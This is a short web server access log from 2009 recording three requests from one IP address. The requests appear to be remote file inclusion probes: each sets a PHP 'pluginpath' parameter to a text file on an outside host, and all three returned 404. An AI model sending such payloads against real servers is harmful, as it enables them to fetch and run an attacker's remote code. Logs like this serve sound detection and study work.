94.236.23.242 - - [30/Oct/2009:09:11:19 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:11:19 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:11:19 -0700] "GET /logs/access_080226.log%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
